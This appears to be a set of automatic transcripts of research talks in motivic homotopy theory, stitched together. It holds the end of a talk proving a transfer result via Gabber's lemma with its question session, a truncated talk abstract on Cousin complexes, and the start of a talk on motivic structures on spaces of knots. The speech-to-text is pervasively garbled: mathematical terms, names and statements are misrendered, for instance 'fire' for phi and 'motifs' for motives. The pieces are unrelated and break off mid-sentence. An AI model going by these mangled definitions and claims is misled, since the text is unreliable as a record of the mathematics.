you have from X to a one. Okay. And now here's the second claim. And the second claim is that there exists more functions that exist by two by three and so on up to five D plus one from X to a one. And then the following holds. So I write five for all of them together if I want to fight D plus one. No, no. And then I hold bunch of properties. So, fire w equals zero and fire set tall at all points of five one inverse of zero intersected with Z. And the thing is there exists an open neighborhood you contained in a one over D such that if I base change you to there and I map it via five to you times a one. This is going to be a closed immersion. And this maybe if you know about these things it looks like Gabbers lemma or like part of Gabbers lemma and indeed that's it's very got it from as you can prove this because of an infinite field by general projection argument. Okay, so now I'm sure you all remember all the 15 functions and schemes and everything that we had so far. So just in case that you don't and also so that I feel like I'm, I'm telling you something let me try to give you an artistic impression of what's going on. So I hope this is going to work and help. But let's try. So what had we done right so we had my we had our scheme X or smooth scheme X. We only have two dimensions so everything is only going to be two dimensional. And so X is just going to be some blob here. Okay, so that's X. Now inside there. We had, we had the Y right this was from smooth scheme of co dimension one. So it's going to be some sort of curvy thing here. So this is my Y. But that's it we have well, we had a Z right so we had some close up scheme also of whatever could I mention D but I mean I only the only choice I have is also going to be some one dimensional guy. But it could have singularities and it turns out that the problem mainly arises if the singularities of Z of meet why. So this is sort of the kind of thing which is going to happen. So this is going to be Z. And then we had the intersection with my which we call W. And that the big deal is that our W is this point here, which is the singularity of Z. So this is what makes everything difficult. Okay, so this is what we had started with. Okay, so what else did we do. Well the first thing which we did was right we cooked up this you. So let's see, let me draw this in here. So the zoo that the you did with this will give me some some other guy right so this is going to be the vanishing locals of you. And this white line is by the way the vanishing locals of. Okay, and then we had like lots of maps the five one up to five D plus one so there's some map which I call by equals five one up to five D plus one. And so this now goes to a n of course, a D plus one. So let me try to draw this. Again, I only have two dimensions. So this is somehow an a one here on the coordinate x one. And there's a one here on the coordinate x E plus one. And then there are some more coordinates in the middle of course but I cannot draw them. And so what what happened here well what happened is that. Right to the five one was the product of you and F. So this axis here is the pre image of that is going to be the union of the blue bits. Right so it's going to be the union of y and some extra thing. And so what else we had to see. Now the Z is going to do something. I'm going to try to draw this maybe like this something like this. Okay so what's going on here well so the W the W still here and still this still this singular point we couldn't do anything. And, but also what can happen is that this you write so this thing here this has some some could have some new intersections with Z right so for example here. So this is some new intersection. So this I cannot avoid. So this is some new intersection. But I had asked that it should not have double roots so this is some new transverse intersection. So at the beginning that the problem is basically when the Z has a singularity on the intersection. So basically what I'm telling you is there's a new intersection but it's, it's good we can understand it. Right and then also what we have said is that on some open neighborhood. This guy here. The Z should be a closed immersion right so now my Z what was it it was the sort of curve here, and it turned into that sort of curve here but now it has a new double point. So that's a problem here. So that's one of my bad points somehow. It's problem, but that's fine. Right so what this is saying here is that it should be a closed immersion locally in this coordinate. So I just throw out this point right so then I might you. I'm going to be a D, which in this case is a one, I suppose, and I'm removing this finitely many bad guys. No problem. And then away from that it's supposed to be a closed immersion so maybe, maybe that's that's what I'm doing. So, somehow morally what has what has happened here is that we managed to straighten out the right to the X and the Y. There were some arbitrary smooth schemes and now we've somehow managed to straighten them out into an into a full a one. That's somehow what the what the gap a lemma always does it gives it gives you somehow enough room to get the full a one. So it's the expense of having sort of this, this new guy here and these new guys here which we now have to deal with. But if you take nothing away from my talk and please somehow remember that that the point of Gabas lemma is to straighten out into an actual a one, whatever whatever that means. So now I have four minutes to try and finish the proof so what do I do. One thing which I do is I let you zero be the intersection of you with the thing where the first one is zero. So in our case, that's just this point here but generally that could be more dimensions. And then it turns out that there's some open subset here, which will be well chosen, and I will not tell you what it does the choice. And then the following things going to happen. So what do I do. Okay, so maybe. Yeah, so maybe I will abbreviate this. And what I will say is, so more steps. I will tell you it suffices to understand the pullback somehow like this HD, the U a one over you have those two HD, the U zero a one over you zero with confidence in it. So the whole exercise of this game was that I replace the situation on the left by the situation on the right. So how is this any better. So one thing which we can observe is that this Z. It is finite over you. So this is some proper morphism. So what I can do is zero was to you finite means that I can embed a one of course into P one, and then it will remain closed in P one. And so I can instead, I can instead let's say, do this. Right. I can instead do this. And it's also enough to understand this. And now, what can I do. Okay, so I have this HD, the U, P one over you with coefficients in F. Now I'm supposed to pull it back here to HD, C, zero, P one over you zero with coefficients in F. However, right, so this zero zero, this is basically just finitely many points. So this group here I can, I can work out using the wash me complex right. So that's just M minus D of W. So that's this point. And then maybe there's some stupid other points, which we have to deal with. Plus, so a whole bunch of points some of I am minus the of why I so these annoying new points. And now, now is where the transfer comes. So there is a transfer map here. And I mean, yes, let me write it. So it goes to HD P of C you by which I mean just the image under the projection in this direction. With coefficient, you with coefficients in F minus one. Right. So if you ignore, if you ignore the supports here, or that's of course I did it wrong. Right. So if you ignore the supports here, this is just saying what is HD P one over something coefficients in F. But you just use the fact that P one is S ones, my GM. So you should remove one from the D and you should remove one from the F. And that's how I got this. And you can check that you can play with the supports here. And this, it turns out is basically the nature of the transfer. So this is what the transfer is. And I can do the same thing. Then I can put back here, HD minus one P of C U zero, U zero, coefficients in F. And there's another transfer here. And this diagram commutes since very elementary. And I can also work out this thing here. So this is M minus D of W again because it's a rational point, plus maybe some other, some other things. So I'm out of time, but also I'm at the end. Right, because you had this. Right. So what does, what does the transfer do. I told you that this abstractly defined map, which has something to do with the transfer. And well, you can see here in this simple case, right. So this is some sum of M minus these evaluated some points, and then they map down to some other points. And so you what you need to do is that you need to find some kind of transfer. And I mean, that's this construction here gives you a transfer. And you can see what this is. But now the point is we had designed this to be right. So this, this W here is the same thing was a rational point. So there's no field extension. So this is actually nice. Okay, so now I'm done right so I had something here. And I supposed to figure out what this is, it's image here. So I need to figure out what it is here and here. And suppose that I know this map here, right. So I had something here, I know it here, I know it here so I know everything here. And also, I had told you that these new points there somehow, there's somehow easy. So also, I know everything here. So basically, in this big group here, I know everything except for this value here. And sometimes if I transfer it down all the way to here. Okay, but now, well, if I just pretended zero here for a bit transfer all of these things down and subtract it off from what it's supposed to be, and then invert this map here. I will find that I figure out what the last component is. And so then, what have we done. Well, it suffices to understand this map. And now we're done because by induction. Right, because I had now managed to reduce the D. And so now you can just go again and eventually you get to D equals zero and equal zero is trivial. So I'm sorry for running over time. But I hope I have given you some idea of how algebraic geometry proves this interesting result in material. Okay, thanks a lot for a wonderful talk Tom. Here. Let's see, are there any questions. Let's start with a question in the corollary the result with Maria Yarkersen. There was a, I think there was a number three showing up. Yes, possible to somehow explain why, why it's number three. Yes. So this number three has something to do with the following thing. Yeah, okay, so what about this read so I'm not sure if it's optimal. What is this right. So it has to do with the following thing you take F minus one has some transfers and F minus two has transfers. They all have transfers and some feeling is that the transfer this guy has transfers. Better transfers. Better better transfers. Right so just like how an E N right so if you take iterated loop spaces classically have like group structure be a group structure. And so the feeling is that eventually, so the F minus infinity should have frame transfers. Now actually, right so it actually turns out that already already F minus three does. And the F minus two, if characteristic is equal to zero. And the conjecture is that F minus one has frame transfers. But so one. Okay, so now that was a lot of waffling but the point is that somehow the contractions give you more and more structure and we believe that you somehow get all structure already after three steps, or after two steps or maybe after one steps and how you need this is the number this is where this number comes from. Right so this number three is because we can prove that after three steps here somehow at the at full structure. Okay, thanks. Then there's a question from Sean Tillson he asks, is there extra structure and that you have now from this scrollery, like more than the Abelian group structure. Yes, I mean. Yes, I mean so one thing which you do learn is that yes if you do pi zero of omega p one cubed sigma p one cubed F, right this is actually a homotopy module. So this has all the structure which you could possibly ask for. In fact, in the proof, we learned this. Right, so already if you're because I mean this is like if you take a three fold loop space and then you have good structure this is not like super exciting thing. The point of the proof is that this already right even without taking loops, you already have a lot of extra structure. So the answer is, yes, we definitely do get more structures on various things and this is basically the heart of the group. And there's a question is there an analog of maze recognition principle for multiple spaces. Well, in the world, does there exist one I hope so, can we prove it. I believe not right now. So we have right so there's there's some there's sort of S one loop space theory, which says can you deal with it in the S one direction and I would argue that this is probably reasonably well understood I'm not sure if it's like written down in this language but this sort of thing we can probably do. But the D D looping in the GM direction is very very hard so we do not have. Yeah, so we do not have recognition principle, right where cove mission principle for even something like P one loop spaces. And then GM loop spaces but the problem is that somehow because GM is not connected itself these things are sort of, it seems likely to me that you might have something like for P one or P one. That's the smash to the dub dub that for these you might have it, but we do not have any of these. We have we do have a recognition principle for motivate infinite loop spaces, which is right so like, like saying that infinity monoliths group like infinity are not group spaces so we have some like that group like spaces with frame transfers, but we definitely do not have this at finite stages. If we did then my result would be much easier or I mean as easy as proving this recognition principle. Yeah please work on that and prove it that would be great. I did not have any characteristic zero to prove your, your theorem, but it characteristics zero doesn't appear in a hypothesis of the fair. Yes, no I mean I did not. I use characteristic zero to make the already probably long and hard to follow argument, a little less annoying characteristic you do something which is roughly the similar story, but this reduction in the beginning. So this point here. This then becomes a few pages to argue that you can still do something like this in positive characteristic. But yeah so this is only I did it to simplify the exposition and only prove a special case. Another question. Can you make a comment on the zero and pi zero of your with your corollary with the accurate some. Well, what can I comment on, on what zero means, or sorry, I'm done quite well. Well, could you change it to pi one. No, I, well, I would like to believe that. What we do very much is confined to pi zero. So I think that, yeah, so I mean I would conjecture or whatever. You would guess that I can do something like pi I here, and then maybe and greater than I know something three I or three plus I don't know what it goes so that that that would be what you think, or what I would think, but I would expect that this probably requires different, different kind of attacks but I don't know so I definitely cannot I wish I could, but I can. Can you explain where the zero comes up and going from the transfer result to the corollary. Yes, I can, I can I think do that. So how does this work. The way this works is that I look at somehow. Right, so I look at the category of S one spectrum. And then I have the category of motivic spectrum. Right, so I can go to here, and I can go to here and basically I want to figure out what this composition is. So I can imagine this is happening somehow in spaces right so I can first smash it with GM and go to them somehow to this as such as one of K one, and then I go to two. And I keep going, and I can always factor it like this. Right, I mean I'm just saying that if you do an infinite iteration of GM loops and GM suspensions you can do one and one and one. And then eventually you always have to infinitely many. And what the what the proof eventually shows is that if you look at the hearts here. Right, so these categories in some sense right to the first one and the first one and so on so forth in a in a way which I find difficult to make precise they approximate this category, well I guess I can take some limit in the category in pure. But whatever. Right. And so what we prove is that shs one of K and heart right so it has this natural functor sh of K effective heart. And this is an equivalent for and greater than equal to three. And then eventually you'll get the corollary from that by some form of manipulations. And the way this works is that basically we know very explicitly what this guy is. And so we have to somehow describe these things very explicitly and why we just find our way through and eventually we see that what what are the objects in here they like these sheaves and they have some extra and then eventually we argue that this is all destruction. And so if you want to do it for like say pipe one right so then you don't have to look at the heart but you have to look at something like this, right, as one. Okay, so the concentrated degree zero and one. So I don't know some sort of motivate one types. And you could try to do the same analysis but it's going to get much more complicated right. And then you have to do it with three types and. Yeah, so that's my attempt at answering your question. Okay, great. Other other questions. Yeah, yeah, just just to understand more precisely. So you don't build pullback maps on the ROS complex. But instead you prove that's it. Instead you prove this independence results. Right. So that that yes, I well I haven't really thought about that. So, or another detail. Yes, so maybe I should say right well you have this thing you have to say it's a C zero of XF goes to C one of XF goes to C two of XF goes to answer and so forth right now you can do the same thing with why. Okay, and then the dream would be that you have some maps here, which make everything work. But the problem is that there is no transfer here and then you cannot write it down so that's the problem. Okay, so but instead. I mean, you can do the support and see thing. Okay, and then I mean this, this guy just goes away. I mean this just doesn't exist. And more don't exist. And then the point is this is formula which was written down how to do it. So there exists a map here and there is this one here and everything commutes right. And so the easy, I mean, the ideal thing would be to prove that this is the correct thing. And I think what my result shows, but I have to have to think about that is that sort of the lowest terms or if these are all zeros right then this map here it does the correct thing. So that there's this map which this fantasy map which you write down, but it will actually give you the thing which comes sort of implicitly out of what I'm doing with a transfer whatever. And I'm, my feeling is that you might be able to soup this up to learn that by some induction thing that it does actually the correct thing right so that that these maps here which you can write down that they all use the correct map and co homology. But I have not actually tried to do that. And I think it would be maybe annoying. But it's not, it's not out of the questions I'm not sure. But I think yeah I it says pullbacks with a rest with complex and I definitely don't do this in general. Okay, thanks. Thanks. Okay, anybody else. I think that concludes the question so thanks again Tom for a wonderful talk. Next up is Dylan. John also asked the negative stable homotopy sheaves and the answers. No. Okay, thank you.
|
Let k be a perfect field and M a strictly homotopy invariant sheaf of abelian groups on Sm_k. The cousin complex can be used to compute the cohomology of a smooth variety X over k with coefficients in M. However, if X --> Y is a morphism of smooth varieties, there is not in general an induced map on cousin complexes, so computing pullbacks of cohomology classes is difficult. In this talk I will explain how such pullbacks may nonetheless be computed, at least up to choosing a good enough cycle representing the cohomology class (which is always possible in principle, but may be difficult in practice). Time permitting, I will mention applications to the
|
10.5446/50932 (DOI)
|
Thank you very much for inviting me to this beautiful conference and to make sure it happens despite the conditions. Yeah, so well I want to tell you about some surprising, at least in my opinion, interaction between low dimensional topology and the theory of motifs. As a disclaimer, I have to say that I'm not by no means an expert in motifs, so it could be that I maybe that I forget to name some people or misattribute some results. This happens, don't hesitate to intervene and correct me. All right, so well let me start by defining the first word in my title, not. So here's the definition. I fix a linear embedding of RM2R3 and I'm going to study a space of long knots, so it's immediate like this. I'm embedding a sub C from RM2R3, so the space of embeddings from R to R3 that coincide with my fixed linear embedding J outside of a compact subset of R. And you equate this with compact open topology, so you, well the topology is not very relevant. Whatever topology is subset by zero is really the set of knots that we know. And more generally we can do this, well there is no reason to restrict to R3 as target. You can do it, you can do the same construction with target Rd for any g that is at least three. The only difference is that for what's special about R3 is that this space has many interesting connected components. The field of like knot theory is about studying the set of components of the space. When d is at least four it's a connected space, but it still it still has higher homotopy groups, so it can be interesting as a space. Okay, so here's a picture of a typical element in the space of long knots in R3. And okay, so let me state the main theorem in a slightly and precise form and I'll give a more precise version as soon as I make more definitions. So the theorem is that for d, yeah for d at least four the space of embeddings of R into Rd has a motivic structure. And in the case of knots the space of embeddings of R into R3, it's not quite that space that will have a motivic structure, it's what I, I, I, do you know, T infinity of that space. And I will define this in the talk, so at the moment you can just view this as an approximation to the space of knots. And in both cases the motifs are over Q. And so what do I mean by a motivic structure? So I said that space has a motivic structure, there is a motivic homotopy type whose materialization is X. And I'm going to define what I mean by motivic homotopy type. Maybe naively you could imagine that a motivic homotopy type would be an object in the, in the unstable motivic homotopy category. It's not quite what I mean. So let me, let me, let me define this now. So I'm going to fix once and for all a number field K and I'm betting I've gained two complex numbers. So we have a question. See by two utilization. Oh, he just answered it. Sorry, he just answered it. Oh, sorry, sorry, excuse me. Okay, good. Right. So once I fix the embedding, I have a better realization. So the most basic version of this is yeah, when I have an algebraic variety or smooth, that says smooth algebraic variety over K, I can basically change it to a complex number along that embedding. And then I have a complex algebraic variety and that has an underlying homotopy type. And then from this construction, I can also have a better realization for any category of motifs over K. And I'm going to denote this better realization function, whatever the sources, I'm going to denote it by B. And it's always going to be relative. So always there will be an embedding signal that is fixed. Okay, so I'm going to denote by D a K comma lambda, the infinity category of motifs over K with coefficient in the commutative ring lambda. So I think it's standard notation. So D a is like with transfers. And I use the etal topology. I think if I use the etal topology, then matter if I have transfers or not. Okay, and now I can define what I mean by simply connected. So I'm going to define first for simply connected motifs with the P type is. And then there is a slightly more involved version for if you want to remove the word simply connected. So simply connected motif commutative type over K is a data of a commutative algebra in the in my category of motifs with coefficients in Q. And requires that this commutative algebra, it's better realization. So it's going to be a cognitive algebra now in the in the deraille category of Q. So it's like what people call it CDGA, quantitative differential graded algebra. I require that that materialization is simply connected. So it doesn't have cohomology in degree zero and one, well in degree zero, you just have the unit and nothing to be one. And the finite type. So finite dimensional, the common g is my dimension degree. Yes, so that's, you should think of this as the rational part of the type. Then for each prime P, I give myself simply connected P complete space except P again of finite type. So finite dimension or common g. Oops, I think we lost connection. Karim, do hear us. Hello, yes, I hear you. Okay, it's not it's not an issue with the IHS. No, no, no. Do hear us. But Jeffrey use Linux computer with the wireless network. Okay, okay. Yeah, okay. Let's continue. It's all right. Okay, sorry. You can still see my screen. I see your pick. I see your picture. I see you, but don't see your file. Your BIMA file. Okay, here you hear that. It's all right. Screen. Yes. Okay, so I was giving the definition of a simply connected motivic and motivic type. So there is a rational part which is a commutative algebra in the category of motives with Q coefficients. For each prime P, I have a P complete space, XP, which is simply connected finite type and has an action of the absolute carrier of my field. And finally, I have a compatibility data between these two things. So for each prime P, I have an equivalence of commutative algebra between the commutative algebra of quotients or XP with coefficients in QP and the commutative, the betualization of the algebra a tensor QP. So maybe a few words of explanations here. So the left hand side maybe is not quite a commutative algebra, but merely an infinity algebra. But that's not very problematic here. You can either strictly fight to a strictly commutative algebra or since we're doing, we're working in infinity categorical language, it's what there's no difference between these two motions. The left hand side has an action of gamma k just because it's a pointer, XP by assumption has an action of gamma k. The right hand side has an action of gamma k. And that's because the isomorphism between betualization and etal realizations. So instead of working with betualization, you could work with etal realizations and you get something which is equivalent and has an action of the opposite. Rafa, we can receive the question to you. What is a commutative algebra in DAKQ? A commutative monoid object? Yes. But yeah, maybe I should emphasize that this notation DAKQ maybe usually is used for the triangulated category of motifs. Here I'm reworking at the infinity categorical level. So a commutative algebra is more data than just a commutative algebra in the triangulated category. Okay. So that's a definition of a simply connected motivic commutative type. So the way you define it formally is by the full input back diagram. So what you have is a category of commutative algebras in DAKQ. It takes the opposite category because it's going to be the cohomology of my homotopy type. Here I have the product of real primes of the category of P-concrete spaces with a gamma-K action. And at the bottom right corner, I have this product of the category of commutative algebras in the direct category of QP with an action of gamma-K. And again, I take the opposite category here. So again, by DAKQ, I don't quite mean the, I don't mean the triangulated category, but really the infinity category of chain complexes with QP coefficients. So, well, this function here is taking, taking code chains on each factor with QP coefficients. And this function here is, well, given a, given a, a motive over K, I have a total realization which will be a chain complex over QP with an action of gamma-K. And then this function here is symmetric in rados. It puts the commutative algebra to commutative algebra. And I can do this for each P and this gives me a map like this. So I take this pullback and maybe I should add some words everywhere. So here it's not, it's like a full subcategory of that where I restrict to spaces which seem to connect it and find a type and similarly here and here. But that's, that's how you uniformly define this, this category. There is a question, I see. No, I don't see any questions to you at the moment. But I see Markov-Balov has raised his hand. I have a question if I see it. Okay. What is the question? Sorry. Q&A. Okay. Jovan, other questions in Q&A? Okay. Good. What was I? Okay. So I have this pullback square and I can compare it to another pullback square which actually defines the category of simply connected homotopy type. And this second pullback square is essentially due to Sullivan. So how can you construct a homotopy type? Well, you have a rational part. So again, by homotopy type, I mean simply connected and find type. So while Sullivan has shown, has showed that a rational homotopy type is the same data as a commutative algebra in chain complexes over Q. So that's, that's this upper right corner. Then I have for each prime P a P-complete part. So I have a space with a P-complete space for each prime P. And I have a compatibility data which is, well, I require that when I extend scalars from Q to QP, the commutative algebra I get is identified with a code change over the component indexed by P with QP coefficients. So this map is taking code change with QP coefficients. So, so, yeah, so that's what Sullivan called the Dirichlet X square. You can reconstruct a homotopy type from a rational data, a P-complete data for each prime and a compatibility between these two things. And actually you can compare these two pullback squares. So there is a, the bottom pullback square is sort of, there is a forgetful map from the top pullback square to the bottom pullback square. So well, to a, to a space with a gamma reaction, you can forget the gamma reaction and it gives you a space. We have a question to you. Not closure of QP? Algebra closure, you mean? Yeah. No, it's really QP. This is, this is a coefficients, not the, not the base. Okay, thank you. Sorry, yeah. So I have a forgetful map from this category, this product to this product. I have a better realization map from this category of commutative algebra to commutative algebras in the derived category of Q. And well, these two, I also have a function from here to here that forgets the gamma reaction. So in fact, the first one is the, the first one is the, the first one is the, so in fact, the first pullback diagram maps to the second pullback diagram. And the map I have, the induced map on the upper right upper left corner, sorry, I call the better realization of the commutative type. So what you become a to be type has a realization that is a homotopy type. So again, remember everything is simply connected. Okay. So how do we construct multiple commutative type? Well, in particular, smooth algebraic varieties over K will give me multiple commutative types. So this superscript SC means simply connected. So what I mean by that is algebraic varieties whose materialization is simply connected. So how do I construct this function? Well, since this this kind of material commutative types is a pullback, I just have to map to each of the three corners. So the rational part, well, to an algebraic variety over K, I can take its motive, which is an object in the category of motives, G, A, K, Q, and I can take a dual, the inner dual of that. That thing will be commutative algebra in the category of motives. So the diagonal of X induces commutative algebra on this object. The P-complete part is given by the et al. homotopic type. So given a smooth algebraic variety over K, I can construct its et al. The et al. homotopic type of its space change to K bar. And then I P-complete that thing. And what I get is a P-complete space with an action of the absolute garaboo for the field. And I didn't write it, but these two pieces of data are compatible. So what I defined here is really a function of two motive commutative types. We have a question. What goes wrong if you allow non-simpli connected spaces? Yeah, some sort of definition is the same for simply non-simpli connected spaces. I'm going to say word in a minute, but yeah, the only difference is you have to be a bit more careful about what you mean by a P-complete space maybe. But I'm going to give an example in a second. Okay, so what can we say about commutative commutative types? Well, we have this theorem which says that the commutative groups of commutative commutative types, the commutative groups of a material commutative type are naturally non-remotives. And this structure is compatible with all the natural operations that you have in commutative group, for example, cup products, but also stimuli-route operations maybe. And you have a kind of Ackman-Hilton dual of this theorem about the homotopy groups. So the homotopy groups of a pointed material commutative type, so material commutative type with the data of a base point can be given a structure of a non-remotive. Yeah, maybe when I say commutative group, I did it in the first year, but not in the second. So what I mean by the homotopy groups is really the homotopy groups of the materialization. And this structure that you have in homotopy groups is compatible with all the natural operations, for example, y-type products. So maybe I'll try to explain how you can prove these theorems. It's not really hard once you have the right definition of the remotives. So I want to say a few words about that. So essentially this follows work of Ayub Iwanari, I misspelled that, the first A and N should be swapped, Shuduri and Galawar. So how did it work? So you, we have the materialization from the category of motifs with z coefficients to the derived category of z. So again, everything is in infinity categorical. So that's a left adjoint. And the right adjoint below our star of this function preserves filtered coordinates. And yeah, moreover, this adjunction is z-linear. So both infinity categories are naturally enriched over the derived category of z. Both left and right adjoint are compatible with the structure. So from these two observations, so we have a, as for any adjunction, we have a common ad. So in that case, we have a common ad on gz. And because of the fact that the right adjunction filter filtered coordinates. So it since it also preserves, of course, homotopy coordinates because gz is a stable infinity category. So in fact, this common ad preserves all coordinates. And also since it's z-linear, I mean, you can, you can, it's not very hard to prove that any z-linear limit preserving function from gz to itself is of the form c maps to c tensor with something. And in that case, since our function is a common ad, this h a guy is, is in fact a co algebra. So this h is just what you get when you apply the common ad to z. So you start, you start with z here. So the complex z concentrated into zero, apply b star and apply b and you get some co algebra. But there is a little bit more structure than that. The b is a symmetric monodal function. And by abstract nonsense, this star is lax monoidal. So so this means that our common ad is actually lax monoidal. And this implies that h upper a is in fact a commutative hop algebra. So z is a unit of gz. So when I apply b star, I get some commutative algebra in motifs. And then when I betualize, I get some commutative algebra in gz. So this h upper a is what people call, I use motivic hardware group. And so by, by abstract nonsense, we have a factorization of the betualization through the category of co modules over this commutative hop algebra. So I reword this here. So maybe I could have first function be tilde. So it's an enhancement of betualization. And the second function u is just forgetful function. You forget commutative structure. An observation that you can make is if a function b was conservative, the betualization, the first function would be an equivalence. This is the content of the when I visit this theorem. So the conservativity is the only thing that is missing. The rest of the hypothesis of the when I visit this theorem are satisfied. So it would be cool that we'd express motifs as co modules over some hop algebra. Unfortunately, the function b is not conservative. So that's something I learned from a paper by a you. But the lack of conservativity, like to construct which is conservative, you actually have to use motifs that are very, that are not geometric. So there is a conjecture that is open that called the conservative conservativity conjecture that the function b is conservative when restricted to geometric motifs. So motifs that come from algebraic varieties. So if this conjecture is true, it would mean that the category of geometric motifs embeds fully in co modules over H A. Maybe a remark. The conservative conjecture is a purely rational question. If it's true, it's true is eco efficiency family through this queue coefficient. And the point is, with, in order to show this, to go from Q to Z, the problem just come might just come from torsion. And you have a theorem called sustainability that tells you that with torsion coefficients, this category D a, it's just essentially an element of D a k with torsion coefficient is a complex with an action of the absolute guarantee of the k. So the, the bit utilization will be, will be conservative. Okay. So what can you do is this hopf of the right, recall it's a hopf of the right in chain complexes or essentially, sorry, over Z. So it's a prioritize of co modules. It could have co modules in lots of different degrees. So if it was concentrated in degrees zero, then the category of co modules would be the derived category of the Abellion category of co modules. So I'd do it by zero FHA or you could also write it by zero FHA. So it would be, that would be great. And conjecturally, this is the case. So it's, that's related to the, the conjecture of the existence of a key structure and the category of motives. So in, we know, so one half of this conjecture, we know that the hopf of the right shade and half homogene negative degrees. So it's a theorem of IUB. And in fact, IUB has an explicit chain complex that represents the hopf of the right. And you think by saying that you'd be able to decide if it has co module gene positive degrees or not, but it's not so easy. But in any case, what's known to theorem of should we and Delaware, the, if you take pi zero FHA or H zero, the zeroes homology group of that thing, you find the motivic category group of the category of the motives. So that you should know what a no-remotive is. You can take this as a definition. So the category of no-remotives is a category of co modules over this. So now it's a hopf algebra over like a, it's a discrete hopf algebra. It's really in the category of a billion groups. It's actually a flat over, over, over Z. So, so yeah, if you want, it's a, it's an affine, an affine group scheme over Z and you look at representations of that. So unconditionally, we actually have factored her betualization through first the category of co modules or HHA. So HHA is something which is potentially derived. And, and then, well, since HHA maps to pi zero FHA because HHA is, is connected, it doesn't have homogeneic negative degree. You have a sort of a forgetful map to, if you have a co module over HHA, it has an underlying co module over HN, namely an object in the derived category of no-remotives. And then you have a forgetful frontier U2 to the derived category of Z. So, so that's unconditional. And the conservativeity conjecture would say that the B tilde is, is maybe not quite an equivalent, but when you restrict to geometry motifs, it would be very faithful. And the T structure conjecture would be saying that U1 is an equivalent. So these two conjecture are true. You've written the category of motifs as the derived category of some, a billion category. Okay, so now I can give the proof of the, of the theorem I mentioned earlier, but homotopy groups of motifs come with a type. So from the, from the construction of no-remotives, you can, you can realize that a no-remotive is data of a rational part, which is, so it's a q vector space with a coaction of this hot filter rubber, q. And for each prime p, I give myself a finitely generated Cp module, m sub t, with a continuous action of the sub garagupa of the field. And some compatibility between the two, the two structures. So I have an isomorphism between when I extend scalars to qp, sorry, I wrote h would be m. So that thing, sorry, the left hand side has a gamma connection. And the right hand side, it also has a gamma connection because, well, you can show that there is any, any no-remotive over q has a non-linear laying. Yeah, when you, when you extend scalars to qp, you have a gamma connection. So, so once you know this, the proof of the theorem is easy. So yeah, recall the theorem is I want to show the homotopy groups of a pointed motificomotif type are no-remotives. So let's take, so recall a pointed motificomotif type is like, I have this, which the commutative algebra in motifs with q coefficients and the head is xp40p, p-complete spaces with gamma k actions. So on the one hand, on the rational part, so I can apply this function u1b, so this is from the previous slide, remember, so u1b, so it's this function that goes from motifs to the dirac category of no-remotives. So that gives me a commutative algebra in the dirac category of no-remotives. And by abstract, yeah, by abstract reasoning, I mean, by, it's a very standard argument that, so if you look at how Sullivan constructs a rational homotopy type from a commutative algebra, so that's what I denote by this brackets here. So yeah, this notation is the rational homotopy type associated to this commutative algebra in the dirac category of q. The point is that the homotopy groups of that will have the structure of no-remotives with q coefficients. Is that the same, sorry, is that the same as the primitive homology of the gadget? Algebra? Yes, yeah, if you, you can also, yeah. Thanks. Right, and also for h prime p, let's straightforward, the homotopy groups of xp will have an action of gamma k, and you have a compatibility between the two pieces of data. Okay, so what happens in the non-simplicated case? I'm not going to do the general theory, but let me give an example. And I think, well, this goes back to work of D'Amin and Koncharov. So we'd like to say, if you have an algebraic right-chiever k, we'd like to say something like the fundamental group is a motif. But of course, it doesn't make a lot of sense, because the fundamental group is in general not a billion. So how can you make sense of that? Well, how do you approximate a group by a billion groups? You have something called the lower central series. So recall the lower central series of a group, I have, it's defined inductively, gamma 0 of g is the group g itself. And then gamma, a different gamma sub i plus one of g to be the things that can be written as a commutator of an element in g and an element in gamma i of g. So it's a sequence of smaller and smaller normal sub groups of g. And I can consider the questions and the organize themselves into a tower indexed by the integers. So I can view this tower as a pro-object in the category of groups. So that's what I call the new potential completion of my group. And the theorem you can prove. So an example, which is a motivating example for what I'm going to talk about, the example of the purebred group. So purebred group, if you consider the hopf algebra of continuous map from P and nil into z. So when continuous in the sense that pro-group has a topology, you give it the inverse limit topology, where you give each term in the tower that is cryptopology. So I can look at continuous functions from that group into z. That's a hopf algebra over z. And the point is that this hopf algebra can be given a structure of a hopf algebra in no remote tips over Q. And maybe, yeah, I should have said that, well, the example, what do you expect this to be true? The point is that the purebred group is a fundamental group of the spatial configurations of n points in the complex plane. So you can view this as the materialization of an algebraic variety, which is the kind of a Q you're going to prove. So in that sense, well, this is a particular case of the general question that I have at the top of this slide. It's not quite pi 1 of x that has the structure of a motif, but it's this hopf algebra, which is sort of the best nilpotent approximation to my group. All right. All right. So that was it for, that's all I wanted to say about motifs. And I'm going back to knots. So yeah, recall, now we have a more precise idea of what I want to do. So recall, my main theorem was about giving the space of knots a motif structure. So I want to say first a few words about manifold calculus, because if you remember in my main theorem, I had this mysterious t infinity thing. So manifold calculus theory that was introduced by William Weiss. So the idea is we'd like to understand the space of embeddings between from a smooth manifold m to a smooth manifold m, m as dimension m and m has dimension m. So that's hard to draw. That's easy to do when the source is a disk. Then the homotopy type of space of embedding is what I denote, FR sub m, the tension bundle of n. So this is the bundle of m frames and the tension bundle of n. So that's a fiber bundle over n, whose fiber over a point is the space of linearly independent families of m vectors in the tension space at that point. So essentially what this is saying is up to homotopy embedding a disk in n, you can just shrink this disk to a very, you can just look locally at the origin of the disk. And then all you have left is the data, the derivative of the embedding, which is a linear map from RM into the tension space at that point. And yeah, by pitting a basis, you can identify it with that space here. As such for one disk, what happened if you have many disks? So if m is a disjunction of k disks, then the summary zoning show that the space of embedding will be homotopy equivalent to the m frame bundle of the tension space of the space of confessions of k points in n. So for each disk, you should remember where you send the center of the disk and the data of the derivative embedding at the center of the disk. That captures everything up to a contractible choice. Okay, so we know what to do for disk condition of disks. So what we can do in general is try to approximate our space of embeddings by such embedding spaces. So we can consider the diagram which sends to an object in the set. I'm going to explain this in a second. For you, I assigned the space of embeddings of human to m. So disk m is the post set of open subsets of m that are diffeomorphic to disjunction of disks. And then I take the whole limit over this post set. And any embedding by restriction to disks will give me a point here. I have a point in each of these spaces and they assemble into pointing the homotopy limit. So that's the idea of many calculus. You try to compute the space of embeddings by studying instead this approximation, which is a complicated whole limit, complicated homotopy limit, but of spaces are well understood. And there's a theorem of Galilean Klein that says that in some cases, so the condition is that the co-dimension is at least three. Then this map is a weak equivalent. But in general, even if the co-dimension is not three, you can denote the limit, like the right hand side of this map. You can denote it by infinity. In fact, you have a tower. So for each k, you can denote by tk of embedding mm, the homotopy limit over the category of disks. So what I denote by disk colors and are equal to k is the category of open sets that are diffeomorphic to a disjunction union of at most k disks. So yeah, everything, these things are organized into, they organize themselves into a tower. So you have a space of embeddings, t infinity, and then you have the tk for each k. So if we do this for not, then there is an important theorem, which is due to Dwyer 